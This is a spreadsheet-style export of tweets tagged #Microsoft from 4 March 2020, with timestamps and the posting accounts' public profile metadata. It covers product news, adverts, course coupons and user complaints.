    <t>{'id': 601941348, 'id_str': '601941348', 'name': 'Sal Herbert', 'screen_name': 'ssally265', 'location': 'Ashtead, Surrey, England', 'description': 'Events coordinator, loves engaging with clients, loves chocolate!', 'url': 'http://t.co/ezFkM9dS7k', 'entities': {'url': {'urls': [{'url': 'http://t.co/ezFkM9dS7k', 'expanded_url': 'http://www.cisilion.com', 'display_url': 'cisilion.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 155, 'friends_count': 740, 'listed_count': 21, 'created_at': 'Thu Jun 07 13:11:52 +0000 2012', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1308,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'http://pbs.twimg.com/profile_images/523094460519825408/UkAspTZc_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/523094460519825408/UkAspTZc_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/601941348/1413550507', 'profile_link_color': 'F5ABB5',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</si>
  <si>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12:00:29 +0000 2020</t>
  </si>
  <si>
    <t>New entry in commercial #quantumComputing: #Honeywell will put trapped ion computing on #Microsoft's quantum #cloud https://t.co/p9eW8NGSW6 #internet #cloud #infoSec #dataSec #hardware #tech #science</t>
  </si>
  <si>
    <t>{'id': 205109688, 'id_str': '205109688', 'name': 'Sang Lee', 'screen_name': 'sang_alertboot', 'location': 'Seoul', 'description': 'Blogger for a data security firm.  News junkie.  Amateur photographer. Polyglot.', 'url': 'http://t.co/0BpTeW2A3J', 'entities': {'url': {'urls': [{'url': 'http://t.co/0BpTeW2A3J', 'expanded_url': 'http://www.alertboot.com/', 'display_url': 'alertboot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 325, 'friends_count': 84, 'listed_count': 766, 'created_at': 'Wed Oct 20 05:08:42 +0000 2010', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14047,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'http://pbs.twimg.com/profile_images/1157854063/twitter_profile_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157854063/twitter_profile_normal.jpg',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</si>
  <si>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12:00:26 +0000 2020</t>
  </si>
  <si>
    <t>Support for Windows 7, Windows SBS 2011 and Server 2008 has now ended. If you're running any of these software systems, it's time to look at upgrading to ensure your systems remain secure. We can help: https://t.co/7v2AofLMGK
#Windows2008 #Windows7 #Secure #SQLServer #Microsoft https://t.co/FtPSHzCUnL</t>
  </si>
  <si>
    <t>{'id': 555144776, 'id_str': '555144776', 'name': 'Konica Minolta GB', 'screen_name': 'KonicaMinoltaGB', 'location': 'Basildon, Essex, SS14 3AR', 'description': '#KonicaMinolta Business Solutions is a leader in the provision of Managed #Print &amp; #Document Services &amp; #Production #Print solutions. Official Konica Minolta UK', 'url': 'https://t.co/LWy8IS3DGV', 'entities': {'url': {'urls': [{'url': 'https://t.co/LWy8IS3DGV', 'expanded_url': 'https://www.konicaminolta.co.uk', 'display_url': 'konicaminolta.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2654, 'friends_count': 265, 'listed_count': 60, 'created_at': 'Mon Apr 16 14:01:17 +0000 2012', 'favourites_count': 736, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4403,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'http://pbs.twimg.com/profile_images/991341278641250304/c7mRgTXG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991341278641250304/c7mRgTXG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/555144776/1570011141',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</si>
  <si>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12:00:20 +0000 2020</t>
  </si>
  <si>
    <t>Maintaining our health is like maintaining the car we drive
Watch #AskTheCEO @robert26smith @narindermakin @Microsoft @Azure timestamp 21:35
#HealthCare #Microsoft #Azure #EmployerWellness #FutureOfWork  #HealthTech
https://t.co/DtHxutVB1g
@eViRaHealth @IrmaRaste @davidhoulding https://t.co/yEUzqOBf1d</t>
  </si>
  <si>
    <t>Wed Mar 04 12:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Check out all the new features announced/released in February for Microsoft Teams. #Microsoft #microsoftteams #technology https://t.co/Bmzx9d9yi6 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 11:57:26 +0000 2020</t>
  </si>
  <si>
    <t>Get to know the features of Power BI Desktop February 2020 here: https://t.co/ewf37JJ4JJ #powerbi #datavisualization #microsoft #businessintelligence</t>
  </si>
  <si>
    <t>{'id': 1587978337, 'id_str': '1587978337', 'name': 'Mindmajix', 'screen_name': 'Mindmajix', 'location': 'India', 'description': '#MindMajix is the leading E-learning Platform which provides Quality #Certified IT Trainings with in-depth conceptual knowledge for better career options.', 'url': 'https://t.co/Ebzo6c2kgF', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ebzo6c2kgF', 'expanded_url': 'https://mindmajix.com/', 'display_url': 'mindmajix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 612, 'friends_count': 523, 'listed_count': 18, 'created_at': 'Fri Jul 12 08:28:34 +0000 2013', 'favourites_count': 735, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1765,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'http://pbs.twimg.com/profile_images/933946025735348224/5c9wB9xb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933946025735348224/5c9wB9xb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1587978337/1559975744',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</si>
  <si>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11:57:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 &amp;amp; SharePoint PnP Weekly - Episode 73 https://t.co/1YcLMZkGpV #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 11:56:27 +0000 2020</t>
  </si>
  <si>
    <t>Both Google and Microsoft are making their professional versions of collaboration video tools (Hangout/Teams) free temporarily due to Corona:
https://t.co/RGS8Rdf9ZT
#Collaboration #CoronaVirus #Google #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1525857632, 'id_str': '1525857632', 'name': 'Mr. Tweet', 'screen_name': 'MisterTweetar', 'location': 'Planet Earth', 'description': 'The uneditted truth', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 73, 'listed_count': 0, 'created_at': 'Mon Jun 17 20:51:11 +0000 2013', 'favourites_count': 438, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 673,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'http://pbs.twimg.com/profile_images/378800000306689811/2c8e9a442da972c1456fcc972f27917d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000306689811/2c8e9a442da972c1456fcc972f27917d_normal.jpeg',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</si>
  <si>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11:56:04 +0000 2020</t>
  </si>
  <si>
    <t>Disruptive, audited &amp;amp; certified! DexMach wants to provide you the best IT cloud solutions for your #business. Learn more about our #microsoft #certified #cloud #migration solutions on our website. #azure #application #modernization #liftshift https://t.co/3Hidz4nGST https://t.co/oKNaj4MwhO</t>
  </si>
  <si>
    <t>Wed Mar 04 11:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Data Science: Natural Language Processing (NLP) in Python #udemycoupon -&amp;gt; https://t.co/gA7x2Rg7tt
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Wed Mar 04 11:54:06 +0000 2020</t>
  </si>
  <si>
    <t>KINGDOM HEARTS 3.
#xbox #xboxone #gamecollector #gamecollection #microsoft #retroplayer #retrogames... https://t.co/onZqzCc4VQ #siguemeytesigo</t>
  </si>
  <si>
    <t>{'id': 2454138679, 'id_str': '2454138679', 'name': 'Ver0Ramirez', 'screen_name': 'Ver0Ramirez', 'location': 'EspaÃ±a', 'description': '#SIGUEMEYTESIGO Aviso de #sorteos de #juegos, #skins, tarjetas de #regalo, #aplicaciones, #noticias, #polÃ­tica, #moda y ayudo en https://t.co/W0edaQXByZ', 'url': 'https://t.co/sxWZy0DSs5', 'entities': {'url': {'urls': [{'url': 'https://t.co/sxWZy0DSs5', 'expanded_url': 'https://metanodo.com', 'display_url': 'metanodo.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/W0edaQXByZ', 'expanded_url': 'http://MetaNodo.com', 'display_url': 'MetaNodo.com', 'indices': [129, 152]}]}}, 'protected': False, 'followers_count': 4772, 'friends_count': 4581, 'listed_count': 9, 'created_at': 'Sun Apr 20 03:30:55 +0000 2014', 'favourites_count': 1157, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3078,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'http://pbs.twimg.com/profile_images/892799287591129088/CABFHZQc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/892799287591129088/CABFHZQc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2454138679/1501694849',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</si>
  <si>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11:52:55 +0000 2020</t>
  </si>
  <si>
    <t>Basecamp Launches Hey For Email Revival
Read full article: https://t.co/Fd6S5guP8y
#distilnfo #itnews #technology #email #microsoft #outlook #bigtech #hotmail #gmail #google https://t.co/r4NGaT3Z4D</t>
  </si>
  <si>
    <t>Wed Mar 04 11:51:55 +0000 2020</t>
  </si>
  <si>
    <t>Indonesia president promises Microsoft simple regulation
 https://t.co/OygMm1Nn7X #indonesia #microsoft #cloud #technews #hosting #news #technology</t>
  </si>
  <si>
    <t>{'id': 1185985024883122180, 'id_str': '1185985024883122180', 'name': 'Cloud7', 'screen_name': 'cloud7news', 'location': 'Istanbul', 'description': 'The community of passionate about new #technologies #cloud #hosting #datacenter #security and #Linux. Come share your passion and debate the #news!', 'url': 'https://t.co/dRxFpuWdTE', 'entities': {'url': {'urls': [{'url': 'https://t.co/dRxFpuWdTE', 'expanded_url': 'https://cloud7.news', 'display_url': 'cloud7.news', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 794, 'friends_count': 2306, 'listed_count': 2, 'created_at': 'Sun Oct 20 18:24:25 +0000 2019', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 735, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1186258126317727744/yR4UKPgQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186258126317727744/yR4UKPgQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1185985024883122180/1582112751',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</si>
  <si>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11:50:41 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 11:47:45 +0000 2020</t>
  </si>
  <si>
    <t>Fine @Microsoft I will uninstall you.@Google seems to think you are ok, but things are defaulting to @MicrosoftEdge 
It's getting ridiculous 
Fix this please. I prefer #Microsoft #choice in #browsers @firefox @DuckDuckGo @googlechrome #BigTech @TMobileHelp</t>
  </si>
  <si>
    <t>{'id': 2548754096, 'id_str': '2548754096', 'name': 'Lisa Kelber', 'screen_name': 'lrkelber', 'location': 'Minneapolis, MN', 'description': "Tech, business, culture, language, travel, food, music, gardening, nature and MN enthusiast. Won't reply to DMs", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3413, 'friends_count': 3128, 'listed_count': 1551, 'created_at': 'Thu Jun 05 21:04:18 +0000 2014', 'favourites_count': 7250, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12726,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'http://pbs.twimg.com/profile_images/886519260578799617/vpqr_bne_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/886519260578799617/vpqr_bne_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2548754096/1500101867', 'profile_link_color': 'A32352',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</si>
  <si>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11:44:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft on Wednesday announced a partnership with #Accenture to help deepen the reach of #entrepreneurs and start-ups that are focused on social impact and #sustainability.
https://t.co/9Ic5jgFviQ</t>
  </si>
  <si>
    <t>{'id': 855111428403023872, 'id_str': '855111428403023872', 'name': 'NewsGram', 'screen_name': 'newsgramDOTcom', 'location': 'Chicago, IL', 'description': 'Official Twitter handle of US-based IRS-approved tax -exempt nonprofit media organization.', 'url': 'https://t.co/krQ5niCGdb', 'entities': {'url': {'urls': [{'url': 'https://t.co/krQ5niCGdb', 'expanded_url': 'http://www.newsgram.com/', 'display_url': 'newsgram.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1316, 'friends_count': 1, 'listed_count': 7, 'created_at': 'Thu Apr 20 17:30:26 +0000 2017', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9818, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/915122563772071937/yU7G4x_l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/915122563772071937/yU7G4x_l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/855111428403023872/1535739013',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</si>
  <si>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11:40:26 +0000 2020</t>
  </si>
  <si>
    <t>It's time to reveal another confirmed speaker!  Brigit Murtaugh, .NET Program Manager at @Microsoft, will be joining us at #DotNet2020 with her session "Bringing Big #DataAnalytics through Apache Spark to .NET". 
@BrigitMurtaugh #DotNetConfSpain #DotNet #NetCore #Microsoft https://t.co/LClJerPKL8</t>
  </si>
  <si>
    <t>Wed Mar 04 11:40:02 +0000 2020</t>
  </si>
  <si>
    <t>Gaming Tech Is Our 
#esports #entertainment #videogames #MicrosoftTeams #microsoft
#xbox https://t.co/M4VrR1mlMG</t>
  </si>
  <si>
    <t>{'id': 199339187, 'id_str': '199339187', 'name': 'shubh sharma', 'screen_name': 'shubh2424', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 10, 'listed_count': 0, 'created_at': 'Wed Oct 06 16:26:51 +0000 2010', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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</si>
  <si>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Mar 04 11:39:54 +0000 2020</t>
  </si>
  <si>
    <t>Cracked on crack #PS4live #videogame #gaming #Quebec #sony #microsoft #Like #Quebec #fortniteplug #Fortnite  live at https://t.co/p3xWgOi0BQ</t>
  </si>
  <si>
    <t>{'id': 1072611529730768896, 'id_str': '1072611529730768896', 'name': 'Eliemin8', 'screen_name': 'eliemin8', 'location': 'Canada QuÃ©bec MontrÃ©al ', 'description': 'Fortnite serial killer', 'url': 'https://t.co/6T5o9EYpwQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/6T5o9EYpwQ', 'expanded_url': 'http://twitch.com/eliemin8', 'display_url': 'twitch.com/eliemin8', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1002, 'friends_count': 443, 'listed_count': 3, 'created_at': 'Tue Dec 11 21:58:11 +0000 2018', 'favourites_count': 5633, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 155, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223829287083573249/vTt_yu_u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223829287083573249/vTt_yu_u_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1072611529730768896/1574555750',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</si>
  <si>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11:37:37 +0000 2020</t>
  </si>
  <si>
    <t>News! #Accenture #Microsoft India, Microsoft and Accenture Team Up to Allow Entrepreneurs to Amplify Social Impact: India, Microsoft and Accenture Team Up to Allow Entrepreneurs to Amplify Social Impact https://t.co/ZbiVTNCPW1 Visit our site! https://t.co/mVT87P1VRn</t>
  </si>
  <si>
    <t>{'id': 1004766234125185024, 'id_str': '1004766234125185024', 'name': 'Fintech Horizons Media', 'screen_name': 'FintechHorizons', 'location': 'Arizona, USA', 'description': 'Fintech Horizons was founded by veteran journalists. We cover startups in insurtech, payments, alternative lending, capital markets and blockchain &amp; more!', 'url': 'https://t.co/OZ7QE3zKYq', 'entities': {'url': {'urls': [{'url': 'https://t.co/OZ7QE3zKYq', 'expanded_url': 'http://www.fintechhorizonsmedia.com', 'display_url': 'fintechhorizonsmedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 228, 'friends_count': 898, 'listed_count': 1, 'created_at': 'Thu Jun 07 16:45:12 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2765, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1036772843206242304/vjGW6gsD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1036772843206242304/vjGW6gsD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1004766234125185024/1537483578',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</si>
  <si>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11:35:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft looking to give away 6 months free trials to help with remote working during corona virus #microsoft #coronavirus #microsoftteams https://t.co/7kyAKt7Nro https://t.co/tjHRGJlhba</t>
  </si>
  <si>
    <t>Wed Mar 04 11:34:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 &amp;amp; SharePoint PnP Weekly - Episode 73 #company #MicrosoftOffice #MicrosoftSharepoint https://t.co/zCUEJSHbD7 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Wed Mar 04 11:30:26 +0000 2020</t>
  </si>
  <si>
    <t>Keep the #Microsoft Ignite the Tour energy going: join #ObjectSharp at the #Developer Virtual Conference for a day of free #Cloud training, from home. Register today for free! https://t.co/aew28aNGMQ https://t.co/kLuZ4gSnSq</t>
  </si>
  <si>
    <t>{'id': 19919659, 'id_str': '19919659', 'name': 'ObjectSharp', 'screen_name': 'ObjectSharp', 'location': 'Toronto, Canada', 'description': "Toronto's premier digital transformation company, accelerating #innovation on the Microsoft #Azure cloud for clients from lean startups to leading enterprises.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 348, 'friends_count': 470, 'listed_count': 25, 'created_at': 'Mon Feb 02 18:03:45 +0000 2009', 'favourites_count': 197, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 358,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'http://pbs.twimg.com/profile_images/1125574433291296768/O0fHVCeG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125574433291296768/O0fHVCeG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19919659/1557523458', 'profile_link_color': '0176FF',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</si>
  <si>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11:30:14 +0000 2020</t>
  </si>
  <si>
    <t>[From the Blog] Application Security Group assignment using PowerShell https://t.co/RouPagFsJt #Microsoft #Azure #AzureFamily #Blog</t>
  </si>
  <si>
    <t>Wed Mar 04 11:30:07 +0000 2020</t>
  </si>
  <si>
    <t>Azure Kubernetes Service  Some interesting videos from Microsoft Build 2019 https://t.co/QMTD41lsfo #Microsoft #Azure #Kubernetes</t>
  </si>
  <si>
    <t>{'id': 29473913, 'id_str': '29473913', 'name': 'Stanislas Quastana', 'screen_name': 'squastana', 'location': 'France', 'description': 'Cloud Solution Architect @ Microsoft, CISSP, CCSP, ISO 27001 Lead Auditor. Fan de Kubernetes. Technophile averti un peu trop geek parfois :-p', 'url': 'https://t.co/3FGlTwZTct', 'entities': {'url': {'urls': [{'url': 'https://t.co/3FGlTwZTct', 'expanded_url': 'http://stanislas.io', 'display_url': 'stanislas.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2328, 'friends_count': 65, 'listed_count': 356, 'created_at': 'Tue Apr 07 15:46:22 +0000 2009', 'favourites_count': 3428, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14750,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'http://pbs.twimg.com/profile_images/1129055851933851648/9gQBPBqa_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129055851933851648/9gQBPBqa_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29473913/1399908104',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</si>
  <si>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Mar 04 11:26:00 +0000 2020</t>
  </si>
  <si>
    <t>New by me @forbes: #Microsoft Nightmare Login #Hack: This New Video Shows How Attackers Can Easily Steal Your #Password https://t.co/HCNpX7195e</t>
  </si>
  <si>
    <t>{'id': 296728882, 'id_str': '296728882', 'name': 'Zak Doffman', 'screen_name': 'UKZak', 'location': 'United Kingdom', 'description': 'Founder/CEO @DigitalBarriers: Surveillance tech for defence, security &amp; counter-terrorism. Cybersecurity @Forbes. zakd@me.com', 'url': 'https://t.co/wevgXjxbna', 'entities': {'url': {'urls': [{'url': 'https://t.co/wevgXjxbna', 'expanded_url': 'http://www.digitalbarriers.com', 'display_url': 'digitalbarriers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3447, 'friends_count': 618, 'listed_count': 79, 'created_at': 'Wed May 11 09:21:37 +0000 2011', 'favourites_count': 3191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2803,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'http://pbs.twimg.com/profile_images/1214321322857304066/cqkDCg6X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214321322857304066/cqkDCg6X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/296728882/1522828373',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</si>
  <si>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11:21:22 +0000 2020</t>
  </si>
  <si>
    <t>M365 is more than a product bundle, it is a business solution with the amount of capabilities, tools and features it provides. Listening from horses mouth #Microsoft is always insightful. Thanks @vuzioncloud for inviting to the partner boot camp</t>
  </si>
  <si>
    <t>{'id': 17820271, 'id_str': '17820271', 'name': 'Mohit Bajaj', 'screen_name': 'mohitbajaj', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 528, 'listed_count': 6, 'created_at': 'Tue Dec 02 22:07:26 +0000 2008', 'favourites_count': 129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2907,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'http://pbs.twimg.com/profile_images/1145257896239947778/5YQNc92u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145257896239947778/5YQNc92u_normal.jpg',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</si>
  <si>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Mar 04 11:17:59 +0000 2020</t>
  </si>
  <si>
    <t>very few countries where Microsoft s AI for Cultural Heritage project will be implemented, more specifically in Olympia.
#culture #culturalheritage #aiforgood #greece #microsoft #msftadvocate                              https://t.co/yDP9Af2lpo</t>
  </si>
  <si>
    <t>{'id': 92010058, 'id_str': '92010058', 'name': 'Tilemachos Moraitis', 'screen_name': 'machosm', 'location': 'Attiki, Greece', 'description': 'ðŸ‡ªðŸ‡º ðŸ‡¬ðŸ‡· Politics, Econ savvy. Enjoy ðŸ“– ðŸ§³ ðŸ€ ðŸ¥‹. Opinions entirely my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 142, 'friends_count': 374, 'listed_count': 4, 'created_at': 'Mon Nov 23 12:44:59 +0000 2009', 'favourites_count': 740, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 713,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'http://pbs.twimg.com/profile_images/1153607982447509504/xJPf39F2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153607982447509504/xJPf39F2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92010058/1528058962',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</si>
  <si>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11:13:00 +0000 2020</t>
  </si>
  <si>
    <t>AZ-203 DEVELOPING SOLUTIONS FOR #MICROSOFT AZURE EXAM PREP
=&amp;gt; https://t.co/pya9hybw59
#ITCERTIFICATION #frontend #codinglife #html5 #ad #javascript #machinelearning #code #mysql #programming #developer #codenewbie #coding #javascript30 #100DaysOfCode #udemy #udemycoupon</t>
  </si>
  <si>
    <t>{'id': 809328568945606656, 'id_str': '809328568945606656', 'name': 'ashifadea', 'screen_name': 'ashifadea2', 'location': '', 'description': '100% Off #Udemy #Coupon . #Free #Discounts Udemy Courses . Online Classes', 'url': 'https://t.co/TXtxQM1zQ1', 'entities': {'url': {'urls': [{'url': 'https://t.co/TXtxQM1zQ1', 'expanded_url': 'https://freeonlinecoursesnet.blogspot.com', 'display_url': 'freeonlinecoursesnet.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 57, 'friends_count': 20, 'listed_count': 1, 'created_at': 'Thu Dec 15 09:25:42 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 284, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/809329454300303360/c6aP0BEP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/809329454300303360/c6aP0BEP_normal.jpg',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</si>
  <si>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11:05:05 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Leaving #WindowsUpdate(s) to build up on your servers can cause downtime and impact on your business operation, make sure you apply them regularly, contact us if you need help or advice: https://t.co/oU5R2j5bfH  
#Microsoft #Windows10 #WednesdayWisdom https://t.co/RFz5QVOmxl</t>
  </si>
  <si>
    <t>{'id': 742253702992539648, 'id_str': '742253702992539648', 'name': 'Wharncliffe', 'screen_name': 'YourWharncliffe', 'location': 'Barnsley, England', 'description': 'Helping our valued clients since 1981, Wharncliffe is an experienced #Sage Business Partner, offering service and #tech support! #Sage200 #SageCRM #Realitex200', 'url': 'https://t.co/a1EwgGZRle', 'entities': {'url': {'urls': [{'url': 'https://t.co/a1EwgGZRle', 'expanded_url': 'http://www.wharncliffe.co.uk', 'display_url': 'wharncliffe.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 319, 'friends_count': 225, 'listed_count': 12, 'created_at': 'Mon Jun 13 07:14:07 +0000 2016', 'favourites_count': 3276, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6259,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'http://pbs.twimg.com/profile_images/1110556658596495360/S6bprUGR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110556658596495360/S6bprUGR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/742253702992539648/1565280033', 'profile_link_color': '006E51',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</si>
  <si>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11:03:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Testing Tweaked Start Menu Design in Windows 10 #windows10 #microsoft https://t.co/1PLYIvfxOE https://t.co/XItbAmy0c6</t>
  </si>
  <si>
    <t>Wed Mar 04 11:02:39 +0000 2020</t>
  </si>
  <si>
    <t>@MicrosoftHelps @Microsoft @MicrosoftDE @surface
I own a 4 year old 3000 Euro Surface Book and my batterys are expanding. It's a known problem. #Microsoft says throw it away for security reasons (batteries exploding) and pay another 700 for a new one. Can't afford it.</t>
  </si>
  <si>
    <t>{'id': 102174908, 'id_str': '102174908', 'name': 'A. Zweistein', 'screen_name': '1n3v3rm1nd420', 'location': 'World', 'description': 'everything is relative', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 245, 'listed_count': 0, 'created_at': 'Tue Jan 05 21:49:38 +0000 2010', 'favourites_count': 765, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 175,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'http://pbs.twimg.com/profile_images/1235167049963524102/FJQ01dTb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235167049963524102/FJQ01dTb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102174908/1522705669',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</si>
  <si>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11:01:42 +0000 2020</t>
  </si>
  <si>
    <t>This is your 24 hour reminder to sign up for our first #Microsoft technology update of 2020.
Tomorrow we will be showing you the latest features and functionality- and even developments that are still in preview.
https://t.co/xzZD1GwDAh</t>
  </si>
  <si>
    <t>Wed Mar 04 11:01:07 +0000 2020</t>
  </si>
  <si>
    <t>A massive congratulations to Analyst Rob and Solution Architect Nelius for their recent exam passes. Rob has passed the Foundation in #BusinessAnalysis and Nelius has passed Microsoft 70-487 exam  #exampass #Microsoft https://t.co/fjoxBp16WI</t>
  </si>
  <si>
